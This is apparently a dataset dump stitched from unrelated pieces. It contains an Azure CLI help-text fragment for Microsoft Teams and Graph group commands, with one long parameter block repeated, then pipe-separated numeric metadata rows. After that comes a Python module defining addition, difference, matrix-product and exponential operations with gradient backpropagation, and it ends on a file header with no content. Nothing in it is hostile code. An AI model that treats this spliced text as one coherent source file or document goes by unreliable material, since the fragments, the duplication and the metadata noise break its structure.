Multiple actions can be specified by using more than one --member-of argument.
- name: --microsoft-graph-group-members
short-summary: "Users and groups that are members of this group. HTTP Methods: GET (supported for all groups), \
POST (supported for Microsoft 365 groups, security groups and mail-enabled security groups), DELETE (supported for \
Microsoft 365 groups and security groups) Nullable."
long-summary: |
Usage: --microsoft-graph-group-members deleted-date-time=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --microsoft-graph-group-members argument.
- name: --members-with-license-errors
short-summary: "A list of group members with license errors from this group-based license assignment. \
Read-only."
long-summary: |
Usage: --members-with-license-errors deleted-date-time=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --members-with-license-errors argument.
- name: --owners
short-summary: "The owners of the group. The owners are a set of non-admin users who are allowed to modify \
this object. Limited to 100 owners. HTTP Methods: GET (supported for all groups), POST (supported for Microsoft 365 \
groups, security groups and mail-enabled security groups), DELETE (supported for Microsoft 365 groups and security \
groups). Nullable."
long-summary: |
Usage: --owners deleted-date-time=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --owners argument.
- name: --transitive-member-of
long-summary: |
Usage: --transitive-member-of deleted-date-time=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --transitive-member-of argument.
- name: --transitive-members
long-summary: |
Usage: --transitive-members deleted-date-time=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --transitive-members argument.
- name: --accepted-senders
short-summary: "The list of users or groups that are allowed to create post's or calendar events in this \
group. If this list is non-empty then only users or groups listed here are allowed to post."
long-summary: |
Usage: --accepted-senders deleted-date-time=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --accepted-senders argument.
- name: --photo
short-summary: "profilePhoto"
long-summary: |
Usage: --photo height=XX width=XX id=XX
height: The height of the photo. Read-only.
width: The width of the photo. Read-only.
id: Read-only.
- name: --photos
short-summary: "The profile photos owned by the group. Read-only. Nullable."
long-summary: |
Usage: --photos height=XX width=XX id=XX
height: The height of the photo. Read-only.
width: The width of the photo. Read-only.
id: Read-only.
Multiple actions can be specified by using more than one --photos argument.
- name: --rejected-senders
short-summary: "The list of users or groups that are not allowed to create posts or calendar events in this \
group. Nullable"
long-summary: |
Usage: --rejected-senders deleted-date-time=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --rejected-senders argument.
- name: --extensions
short-summary: "The collection of open extensions defined for the group. Read-only. Nullable."
long-summary: |
Usage: --extensions id=XX
id: Read-only.
Multiple actions can be specified by using more than one --extensions argument.
- name: --group-lifecycle-policies
short-summary: "The collection of lifecycle policies for this group. Read-only. Nullable."
long-summary: |
Usage: --group-lifecycle-policies alternate-notification-emails=XX group-lifetime-in-days=XX \
managed-group-types=XX id=XX
alternate-notification-emails: List of email address to send notifications for groups without owners. \
Multiple email address can be defined by separating email address with a semicolon.
group-lifetime-in-days: Number of days before a group expires and needs to be renewed. Once renewed, the \
group expiration is extended by the number of days defined.
managed-group-types: The group type for which the expiration policy applies. Possible values are All, \
Selected or None.
id: Read-only.
Multiple actions can be specified by using more than one --group-lifecycle-policies argument.
- name: --offer-shift-requests
long-summary: |
Usage: --offer-shift-requests recipient-action-date-time=XX recipient-action-message=XX \
recipient-user-id=XX sender-shift-id=XX assigned-to=XX manager-action-date-time=XX manager-action-message=XX \
manager-user-id=XX sender-date-time=XX sender-message=XX sender-user-id=XX state=XX created-date-time=XX \
last-modified-date-time=XX application=XX device=XX user=XX id=XX
recipient-action-date-time: The Timestamp type represents date and time information using ISO 8601 format \
and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
recipient-action-message: Custom message sent by recipient of the offer shift request.
recipient-user-id: User ID of the recipient of the offer shift request.
sender-shift-id: User ID of the sender of the offer shift request.
created-date-time: The Timestamp type represents date and time information using ISO 8601 format and is \
always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
last-modified-date-time: The Timestamp type represents date and time information using ISO 8601 format and \
is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
application: identity
device: identity
user: identity
id: Read-only.
Multiple actions can be specified by using more than one --offer-shift-requests argument.
- name: --open-shift-change-requests
long-summary: |
Usage: --open-shift-change-requests open-shift-id=XX assigned-to=XX manager-action-date-time=XX \
manager-action-message=XX manager-user-id=XX sender-date-time=XX sender-message=XX sender-user-id=XX state=XX \
created-date-time=XX last-modified-date-time=XX application=XX device=XX user=XX id=XX
open-shift-id: ID for the open shift.
created-date-time: The Timestamp type represents date and time information using ISO 8601 format and is \
always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
last-modified-date-time: The Timestamp type represents date and time information using ISO 8601 format and \
is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
application: identity
device: identity
user: identity
id: Read-only.
Multiple actions can be specified by using more than one --open-shift-change-requests argument.
- name: --scheduling-groups
short-summary: "The logical grouping of users in the schedule (usually by role)."
long-summary: |
Usage: --scheduling-groups display-name=XX is-active=XX user-ids=XX created-date-time=XX \
last-modified-date-time=XX application=XX device=XX user=XX id=XX
display-name: The display name for the schedulingGroup. Required.
is-active: Indicates whether the schedulingGroup can be used when creating new entities or updating \
existing ones. Required.
user-ids: The list of user IDs that are a member of the schedulingGroup. Required.
created-date-time: The Timestamp type represents date and time information using ISO 8601 format and is \
always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
last-modified-date-time: The Timestamp type represents date and time information using ISO 8601 format and \
is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
application: identity
device: identity
user: identity
id: Read-only.
Multiple actions can be specified by using more than one --scheduling-groups argument.
- name: --swap-shifts-change-requests
long-summary: |
Usage: --swap-shifts-change-requests recipient-shift-id=XX recipient-action-date-time=XX \
recipient-action-message=XX recipient-user-id=XX sender-shift-id=XX assigned-to=XX manager-action-date-time=XX \
manager-action-message=XX manager-user-id=XX sender-date-time=XX sender-message=XX sender-user-id=XX state=XX \
created-date-time=XX last-modified-date-time=XX application=XX device=XX user=XX id=XX
recipient-shift-id: ShiftId for the recipient user with whom the request is to swap.
recipient-action-date-time: The Timestamp type represents date and time information using ISO 8601 format \
and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
recipient-action-message: Custom message sent by recipient of the offer shift request.
recipient-user-id: User ID of the recipient of the offer shift request.
sender-shift-id: User ID of the sender of the offer shift request.
created-date-time: The Timestamp type represents date and time information using ISO 8601 format and is \
always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
last-modified-date-time: The Timestamp type represents date and time information using ISO 8601 format and \
is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
application: identity
device: identity
user: identity
id: Read-only.
Multiple actions can be specified by using more than one --swap-shifts-change-requests argument.
- name: --time-off-reasons
short-summary: "The set of reasons for a time off in the schedule."
long-summary: |
Usage: --time-off-reasons display-name=XX icon-type=XX is-active=XX created-date-time=XX \
last-modified-date-time=XX application=XX device=XX user=XX id=XX
display-name: The name of the timeOffReason. Required.
is-active: Indicates whether the timeOffReason can be used when creating new entities or updating existing \
ones. Required.
created-date-time: The Timestamp type represents date and time information using ISO 8601 format and is \
always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
last-modified-date-time: The Timestamp type represents date and time information using ISO 8601 format and \
is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
application: identity
device: identity
user: identity
id: Read-only.
Multiple actions can be specified by using more than one --time-off-reasons argument.
- name: --time-off-requests
long-summary: |
Usage: --time-off-requests end-date-time=XX start-date-time=XX time-off-reason-id=XX assigned-to=XX \
manager-action-date-time=XX manager-action-message=XX manager-user-id=XX sender-date-time=XX sender-message=XX \
sender-user-id=XX state=XX created-date-time=XX last-modified-date-time=XX application=XX device=XX user=XX id=XX
end-date-time: The Timestamp type represents date and time information using ISO 8601 format and is always \
in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
start-date-time: The Timestamp type represents date and time information using ISO 8601 format and is \
always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
time-off-reason-id: The reason for the time off.
created-date-time: The Timestamp type represents date and time information using ISO 8601 format and is \
always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
last-modified-date-time: The Timestamp type represents date and time information using ISO 8601 format and \
is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
application: identity
device: identity
user: identity
id: Read-only.
Multiple actions can be specified by using more than one --time-off-requests argument.
"""
helps['teams user delete-joined-team'] = """
type: command
short-summary: "Delete navigation property joinedTeams for users."
"""
helps['teams user list-joined-team'] = """
type: command
short-summary: "Get joinedTeams from users."
"""
helps['teams user show-joined-team'] = """
type: command
short-summary: "Get joinedTeams from users."
"""
helps['teams user update-joined-team'] = """
type: command
short-summary: "Update the navigation property joinedTeams in users."
parameters:
- name: --fun-settings
short-summary: "teamFunSettings"
long-summary: |
Usage: --fun-settings allow-custom-memes=XX allow-giphy=XX allow-stickers-and-memes=XX \
giphy-content-rating=XX
allow-custom-memes: If set to true, enables users to include custom memes.
allow-giphy: If set to true, enables Giphy use.
allow-stickers-and-memes: If set to true, enables users to include stickers and memes.
- name: --guest-settings
short-summary: "teamGuestSettings"
long-summary: |
Usage: --guest-settings allow-create-update-channels=XX allow-delete-channels=XX
allow-create-update-channels: If set to true, guests can add and update channels.
allow-delete-channels: If set to true, guests can delete channels.
- name: --member-settings
short-summary: "teamMemberSettings"
long-summary: |
Usage: --member-settings allow-add-remove-apps=XX allow-create-private-channels=XX \
allow-create-update-channels=XX allow-create-update-remove-connectors=XX allow-create-update-remove-tabs=XX \
allow-delete-channels=XX
allow-add-remove-apps: If set to true, members can add and remove apps.
allow-create-private-channels: If set to true, members can add and update private channels.
allow-create-update-channels: If set to true, members can add and update channels.
allow-create-update-remove-connectors: If set to true, members can add, update, and remove connectors.
allow-create-update-remove-tabs: If set to true, members can add, update, and remove tabs.
allow-delete-channels: If set to true, members can delete channels.
- name: --messaging-settings
short-summary: "teamMessagingSettings"
long-summary: |
Usage: --messaging-settings allow-channel-mentions=XX allow-owner-delete-messages=XX \
allow-team-mentions=XX allow-user-delete-messages=XX allow-user-edit-messages=XX
allow-channel-mentions: If set to true, @channel mentions are allowed.
allow-owner-delete-messages: If set to true, owners can delete any message.
allow-team-mentions: If set to true, @team mentions are allowed.
allow-user-delete-messages: If set to true, users can delete their messages.
allow-user-edit-messages: If set to true, users can edit their messages.
- name: --members
short-summary: "Members and owners of the team."
long-summary: |
Usage: --members display-name=XX roles=XX id=XX
display-name: The display name of the user.
roles: The roles for that user.
id: Read-only.
Multiple actions can be specified by using more than one --members argument.
- name: --assigned-labels
short-summary: "The list of sensitivity label pairs (label ID, label name) associated with an Microsoft 365 \
group. Returned only on $select. Read-only."
long-summary: |
Usage: --assigned-labels display-name=XX label-id=XX
display-name: The display name of the label. Read-only.
label-id: The unique identifier of the label.
Multiple actions can be specified by using more than one --assigned-labels argument.
- name: --assigned-licenses
short-summary: "The licenses that are assigned to the group. Returned only on $select. Read-only."
long-summary: |
Usage: --assigned-licenses disabled-plans=XX sku-id=XX
disabled-plans: A collection of the unique identifiers for plans that have been disabled.
sku-id: The unique identifier for the SKU.
Multiple actions can be specified by using more than one --assigned-licenses argument.
- name: --license-processing-state
short-summary: "licenseProcessingState"
long-summary: |
Usage: --license-processing-state state=XX
- name: --on-premises-provisioning-errors
short-summary: "Errors when using Microsoft synchronization product during provisioning. Returned by default."
long-summary: |
Usage: --on-premises-provisioning-errors category=XX occurred-date-time=XX property-causing-error=XX \
value=XX
category: Category of the provisioning error. Note: Currently, there is only one possible value. Possible \
value: PropertyConflict - indicates a property value is not unique. Other objects contain the same value for the \
property.
occurred-date-time: The date and time at which the error occurred.
property-causing-error: Name of the directory property causing the error. Current possible values: \
UserPrincipalName or ProxyAddress
value: Value of the property causing the error.
Multiple actions can be specified by using more than one --on-premises-provisioning-errors argument.
- name: --app-role-assignments
long-summary: |
Usage: --app-role-assignments app-role-id=XX created-date-time=XX principal-display-name=XX \
principal-id=XX principal-type=XX resource-display-name=XX resource-id=XX deleted-date-time=XX id=XX
app-role-id: The identifier (id) for the app role which is assigned to the principal. This app role must \
be exposed in the appRoles property on the resource application's service principal (resourceId). If the resource \
application has not declared any app roles, a default app role ID of 00000000-0000-0000-0000-000000000000 can be \
specified to signal that the principal is assigned to the resource app without any specific app roles. Required on \
create. Does not support $filter.
principal-display-name: The display name of the user, group, or service principal that was granted the app \
role assignment. Read-only. Supports $filter (eq and startswith).
principal-id: The unique identifier (id) for the user, group or service principal being granted the app \
role. Required on create. Does not support $filter.
principal-type: The type of the assigned principal. This can either be 'User', 'Group' or \
'ServicePrincipal'. Read-only. Does not support $filter.
resource-display-name: The display name of the resource app's service principal to which the assignment is \
made. Does not support $filter.
resource-id: The unique identifier (id) for the resource service principal for which the assignment is \
made. Required on create. Supports $filter (eq only).
id: Read-only.
Multiple actions can be specified by using more than one --app-role-assignments argument.
- name: --created-on-behalf-of
short-summary: "Represents an Azure Active Directory object. The directoryObject type is the base type for \
many other directory entity types."
long-summary: |
Usage: --created-on-behalf-of deleted-date-time=XX id=XX
id: Read-only.
- name: --member-of
short-summary: "Groups that this group is a member of. HTTP Methods: GET (supported for all groups). \
Read-only. Nullable."
long-summary: |
Usage: --member-of deleted-date-time=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --member-of argument.
- name: --microsoft-graph-group-members
short-summary: "Users and groups that are members of this group. HTTP Methods: GET (supported for all groups), \
POST (supported for Microsoft 365 groups, security groups and mail-enabled security groups), DELETE (supported for \
Microsoft 365 groups and security groups) Nullable."
long-summary: |
Usage: --microsoft-graph-group-members deleted-date-time=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --microsoft-graph-group-members argument.
- name: --members-with-license-errors
short-summary: "A list of group members with license errors from this group-based license assignment. \
Read-only."
long-summary: |
Usage: --members-with-license-errors deleted-date-time=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --members-with-license-errors argument.
- name: --owners
short-summary: "The owners of the group. The owners are a set of non-admin users who are allowed to modify \
this object. Limited to 100 owners. HTTP Methods: GET (supported for all groups), POST (supported for Microsoft 365 \
groups, security groups and mail-enabled security groups), DELETE (supported for Microsoft 365 groups and security \
groups). Nullable."
long-summary: |
Usage: --owners deleted-date-time=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --owners argument.
- name: --transitive-member-of
long-summary: |
Usage: --transitive-member-of deleted-date-time=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --transitive-member-of argument.
- name: --transitive-members
long-summary: |
Usage: --transitive-members deleted-date-time=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --transitive-members argument.
- name: --accepted-senders
short-summary: "The list of users or groups that are allowed to create post's or calendar events in this \
group. If this list is non-empty then only users or groups listed here are allowed to post."
long-summary: |
Usage: --accepted-senders deleted-date-time=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --accepted-senders argument.
- name: --photo
short-summary: "profilePhoto"
long-summary: |
Usage: --photo height=XX width=XX id=XX
height: The height of the photo. Read-only.
width: The width of the photo. Read-only.
id: Read-only.
- name: --photos
short-summary: "The profile photos owned by the group. Read-only. Nullable."
long-summary: |
Usage: --photos height=XX width=XX id=XX
height: The height of the photo. Read-only.
width: The width of the photo. Read-only.
id: Read-only.
Multiple actions can be specified by using more than one --photos argument.
- name: --rejected-senders
short-summary: "The list of users or groups that are not allowed to create posts or calendar events in this \
group. Nullable"
long-summary: |
Usage: --rejected-senders deleted-date-time=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --rejected-senders argument.
- name: --extensions
short-summary: "The collection of open extensions defined for the group. Read-only. Nullable."
long-summary: |
Usage: --extensions id=XX
id: Read-only.
Multiple actions can be specified by using more than one --extensions argument.
- name: --group-lifecycle-policies
short-summary: "The collection of lifecycle policies for this group. Read-only. Nullable."
long-summary: |
Usage: --group-lifecycle-policies alternate-notification-emails=XX group-lifetime-in-days=XX \
managed-group-types=XX id=XX
alternate-notification-emails: List of email address to send notifications for groups without owners. \
Multiple email address can be defined by separating email address with a semicolon.
group-lifetime-in-days: Number of days before a group expires and needs to be renewed. Once renewed, the \
group expiration is extended by the number of days defined.
managed-group-types: The group type for which the expiration policy applies. Possible values are All, \
Selected or None.
id: Read-only.
Multiple actions can be specified by using more than one --group-lifecycle-policies argument.
- name: --offer-shift-requests
long-summary: |
Usage: --offer-shift-requests recipient-action-date-time=XX recipient-action-message=XX \
recipient-user-id=XX sender-shift-id=XX assigned-to=XX manager-action-date-time=XX manager-action-message=XX \
manager-user-id=XX sender-date-time=XX sender-message=XX sender-user-id=XX state=XX created-date-time=XX \
last-modified-date-time=XX application=XX device=XX user=XX id=XX
recipient-action-date-time: The Timestamp type represents date and time information using ISO 8601 format \
and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
recipient-action-message: Custom message sent by recipient of the offer shift request.
recipient-user-id: User ID of the recipient of the offer shift request.
sender-shift-id: User ID of the sender of the offer shift request.
created-date-time: The Timestamp type represents date and time information using ISO 8601 format and is \
always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
last-modified-date-time: The Timestamp type represents date and time information using ISO 8601 format and \
is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
application: identity
device: identity
user: identity
id: Read-only.
Multiple actions can be specified by using more than one --offer-shift-requests argument.
- name: --open-shift-change-requests
long-summary: |
Usage: --open-shift-change-requests open-shift-id=XX assigned-to=XX manager-action-date-time=XX \
manager-action-message=XX manager-user-id=XX sender-date-time=XX sender-message=XX sender-user-id=XX state=XX \
created-date-time=XX last-modified-date-time=XX application=XX device=XX user=XX id=XX
open-shift-id: ID for the open shift.
created-date-time: The Timestamp type represents date and time information using ISO 8601 format and is \
always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
last-modified-date-time: The Timestamp type represents date and time information using ISO 8601 format and \
is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
application: identity
device: identity
user: identity
id: Read-only.
Multiple actions can be specified by using more than one --open-shift-change-requests argument.
- name: --scheduling-groups
short-summary: "The logical grouping of users in the schedule (usually by role)."
long-summary: |
Usage: --scheduling-groups display-name=XX is-active=XX user-ids=XX created-date-time=XX \
last-modified-date-time=XX application=XX device=XX user=XX id=XX
display-name: The display name for the schedulingGroup. Required.
is-active: Indicates whether the schedulingGroup can be used when creating new entities or updating \
existing ones. Required.
user-ids: The list of user IDs that are a member of the schedulingGroup. Required.
created-date-time: The Timestamp type represents date and time information using ISO 8601 format and is \
always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
last-modified-date-time: The Timestamp type represents date and time information using ISO 8601 format and \
is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
application: identity
device: identity
user: identity
id: Read-only.
Multiple actions can be specified by using more than one --scheduling-groups argument.
- name: --swap-shifts-change-requests
long-summary: |
Usage: --swap-shifts-change-requests recipient-shift-id=XX recipient-action-date-time=XX \
recipient-action-message=XX recipient-user-id=XX sender-shift-id=XX assigned-to=XX manager-action-date-time=XX \
manager-action-message=XX manager-user-id=XX sender-date-time=XX sender-message=XX sender-user-id=XX state=XX \
created-date-time=XX last-modified-date-time=XX application=XX device=XX user=XX id=XX
recipient-shift-id: ShiftId for the recipient user with whom the request is to swap.
recipient-action-date-time: The Timestamp type represents date and time information using ISO 8601 format \
and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
recipient-action-message: Custom message sent by recipient of the offer shift request.
recipient-user-id: User ID of the recipient of the offer shift request.
sender-shift-id: User ID of the sender of the offer shift request.
created-date-time: The Timestamp type represents date and time information using ISO 8601 format and is \
always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
last-modified-date-time: The Timestamp type represents date and time information using ISO 8601 format and \
is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
application: identity
device: identity
user: identity
id: Read-only.
Multiple actions can be specified by using more than one --swap-shifts-change-requests argument.
- name: --time-off-reasons
short-summary: "The set of reasons for a time off in the schedule."
long-summary: |
Usage: --time-off-reasons display-name=XX icon-type=XX is-active=XX created-date-time=XX \
last-modified-date-time=XX application=XX device=XX user=XX id=XX
display-name: The name of the timeOffReason. Required.
is-active: Indicates whether the timeOffReason can be used when creating new entities or updating existing \
ones. Required.
created-date-time: The Timestamp type represents date and time information using ISO 8601 format and is \
always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
last-modified-date-time: The Timestamp type represents date and time information using ISO 8601 format and \
is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
application: identity
device: identity
user: identity
id: Read-only.
Multiple actions can be specified by using more than one --time-off-reasons argument.
- name: --time-off-requests
long-summary: |
Usage: --time-off-requests end-date-time=XX start-date-time=XX time-off-reason-id=XX assigned-to=XX \
manager-action-date-time=XX manager-action-message=XX manager-user-id=XX sender-date-time=XX sender-message=XX \
sender-user-id=XX state=XX created-date-time=XX last-modified-date-time=XX application=XX device=XX user=XX id=XX
end-date-time: The Timestamp type represents date and time information using ISO 8601 format and is always \
in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
start-date-time: The Timestamp type represents date and time information using ISO 8601 format and is \
always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
time-off-reason-id: The reason for the time off.
created-date-time: The Timestamp type represents date and time information using ISO 8601 format and is \
always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
last-modified-date-time: The Timestamp type represents date and time information using ISO 8601 format and \
is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
application: identity
device: identity
user: identity
id: Read-only.
Multiple actions can be specified by using more than one --time-off-requests argument.
"""
| 53.746524
| 121
| 0.673081
| 39,526
| 282,223
| 4.805242
| 0.018924
| 0.032606
| 0.031338
| 0.022161
| 0.99175
| 0.989065
| 0.983973
| 0.976576
| 0.968599
| 0.960096
| 0
| 0.013358
| 0.247177
| 282,223
| 5,250
| 122
| 53.756762
| 0.880554
| 0.001665
| 0
| 0.934248
| 0
| 0.240204
| 0.985363
| 0.095381
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.000221
| 0
| 0.000221
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
297e66e054c3ae04c7c282030226dd5a0ca6ec7a
| 6,400
|
py
|
Python
|
python/modprop/modules/math_modules.py
|
Humhu/modprop
|
0cff8240d5e1522f620de8004c22a74491a0c9fb
|
[
"AFL-3.0"
] | 1
|
2017-11-10T00:54:53.000Z
|
2017-11-10T00:54:53.000Z
|
python/modprop/modules/math_modules.py
|
Humhu/modprop
|
0cff8240d5e1522f620de8004c22a74491a0c9fb
|
[
"AFL-3.0"
] | null | null | null |
python/modprop/modules/math_modules.py
|
Humhu/modprop
|
0cff8240d5e1522f620de8004c22a74491a0c9fb
|
[
"AFL-3.0"
] | null | null | null |
"""This module contains Module implementations that perform basic mathematical operations.
"""
import numpy as np
from modprop.core.modules_core import ModuleBase, InputPort, OutputPort
class AdditionModule(ModuleBase):
"""A module that computes a sum.
Input Ports
-----------
left_port : ND-array left-hand-side term
right_port : ND-array right-hand-side term
Output Ports
------------
out_port : ND-array sum, computed as left + right
"""
def __init__(self):
ModuleBase.__init__(self)
self._left_port = InputPort(self)
self._right_port = InputPort(self)
self._out_port = OutputPort(self)
ModuleBase.register_inputs(self, self._left_port)
ModuleBase.register_inputs(self, self._right_port)
ModuleBase.register_outputs(self, self._out_port)
def foreprop(self):
if not self.foreprop_ready():
return []
out = self._left_port.value + self._right_port.value
return self._out_port.foreprop(out)
def backprop(self):
if not self.backprop_ready():
return []
back = []
dim = len(self._right_port.value.flat)
dout_dright = np.identity(dim)
do_dright = self._out_port.chain_backprop(dy_dx=dout_dright)
back += self._right_port.backprop(do_dright)
dout_dleft = np.identity(dim)
do_dleft = self._out_port.chain_backprop(dy_dx=dout_dleft)
back += self._left_port.backprop(do_dleft)
return back
@property
def left_port(self):
return self._left_port
@property
def right_port(self):
return self._right_port
@property
def out_port(self):
return self._out_port
class DifferenceModule(ModuleBase):
"""A module that computes a difference.
Input Ports
-----------
left_port : ND-array left-hand-side term
right_port : ND-array right-hand-side term
Output Ports
------------
out_port : ND-array difference, computed as left - right
"""
def __init__(self):
ModuleBase.__init__(self)
self._left_port = InputPort(self)
self._right_port = InputPort(self)
self._out_port = OutputPort(self)
ModuleBase.register_inputs(self, self._left_port)
ModuleBase.register_inputs(self, self._right_port)
ModuleBase.register_outputs(self, self._out_port)
def foreprop(self):
if not self.foreprop_ready():
return []
out = self._left_port.value - self._right_port.value
return self._out_port.foreprop(out)
def backprop(self):
if not self.backprop_ready():
return []
back = []
dim = len(self._right_port.value.flat)
dout_dright = - np.identity(dim)
do_dright = self._out_port.chain_backprop(dy_dx=dout_dright)
back += self._right_port.backprop(do_dright)
dout_dleft = np.identity(dim)
do_dleft = self._out_port.chain_backprop(dy_dx=dout_dleft)
back += self._left_port.backprop(do_dleft)
return back
@property
def left_port(self):
return self._left_port
@property
def right_port(self):
return self._right_port
@property
def out_port(self):
return self._out_port
class MatrixProductModule(ModuleBase):
"""A module that computes a matrix product.
Input Ports
-----------
left_port : ND-array left-hand-side factor
right_port : ND-array right-hand-side factor
Output Ports
------------
out_port : ND-array product, computed as np.dot(left, right)
"""
def __init__(self):
ModuleBase.__init__(self)
self._left_port = InputPort(self)
self._right_port = InputPort(self)
self._out_port = OutputPort(self)
ModuleBase.register_inputs(self, self._left_port)
ModuleBase.register_inputs(self, self._right_port)
ModuleBase.register_outputs(self, self._out_port)
def foreprop(self):
if not self.foreprop_ready():
return []
out = np.dot(self._left_port.value, self._right_port.value)
return self._out_port.foreprop(out)
def backprop(self):
if not self.backprop_ready():
return []
back = []
if len(self._right_port.value.shape) == 1:
n = 1
elif len(self._right_port.value.shape) == 2:
n = self._right_port.value.shape[1]
else:
raise ValueError('Right input must be at most 2D')
dout_dright = np.kron(np.identity(n), self._left_port.value)
do_dright = self._out_port.chain_backprop(dy_dx=dout_dright)
back += self._right_port.backprop(do_dright)
m = self._left_port.value.shape[0]
dout_dleft = np.kron(self._right_port.value.T, np.identity(m))
do_dleft = self._out_port.chain_backprop(dy_dx=dout_dleft)
back += self._left_port.backprop(do_dleft)
return back
@property
def left_port(self):
return self._left_port
@property
def right_port(self):
return self._right_port
@property
def out_port(self):
return self._out_port
class ExponentialModule(ModuleBase):
"""A module that exponentiates its input.
Input Ports
-----------
in_port : ND-array input to be exponentiated
Output Ports
------------
out_port : ND-array exponentiated output, same size as input
"""
def __init__(self):
ModuleBase.__init__(self)
self._in_port = InputPort(self)
self._out_port = OutputPort(self)
ModuleBase.register_inputs(self, self._in_port)
ModuleBase.register_outputs(self, self._out_port)
def foreprop(self):
if not self.foreprop_ready():
return []
out = np.exp(self._in_port.value)
return self._out_port.foreprop(out)
def backprop(self):
if not self.backprop_ready():
return []
# do_dout = self._out_port.backprop_value
dout_din = np.diag(self._out_port.value.flatten('F'))
# do_din = np.dot(do_dout, dout_din)
do_din = self._out_port.chain_backprop(dy_dx=dout_din)
return self._in_port.backprop(do_din)
@property
def in_port(self):
return self._in_port
@property
def out_port(self):
return self._out_port
| 27.118644
| 90
| 0.635781
| 817
| 6,400
| 4.665851
| 0.123623
| 0.060598
| 0.072141
| 0.051941
| 0.80063
| 0.80063
| 0.743704
| 0.72744
| 0.719045
| 0.709339
| 0
| 0.001264
| 0.258594
| 6,400
| 235
| 91
| 27.234043
| 0.802107
| 0.164688
| 0
| 0.79562
| 0
| 0
| 0.005973
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.167883
| false
| 0
| 0.014599
| 0.080292
| 0.408759
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4635f88bb05b990556cab591384e541776ea4b15
| 127,739
|
py
|
Python
|
tests/scripts/thread-cert/test_lowpan.py
|
doublemis1/openthread
|
2bb72299d3d91109247001116a1e15a3bbbf8f68
|
[
"BSD-3-Clause"
] | 1
|
2022-03-18T11:20:13.000Z
|
2022-03-18T11:20:13.000Z
|
tests/scripts/thread-cert/test_lowpan.py
|
doublemis1/openthread
|
2bb72299d3d91109247001116a1e15a3bbbf8f68
|
[
"BSD-3-Clause"
] | 3
|
2017-03-30T22:36:13.000Z
|
2020-05-29T15:04:28.000Z
|
tests/scripts/thread-cert/test_lowpan.py
|
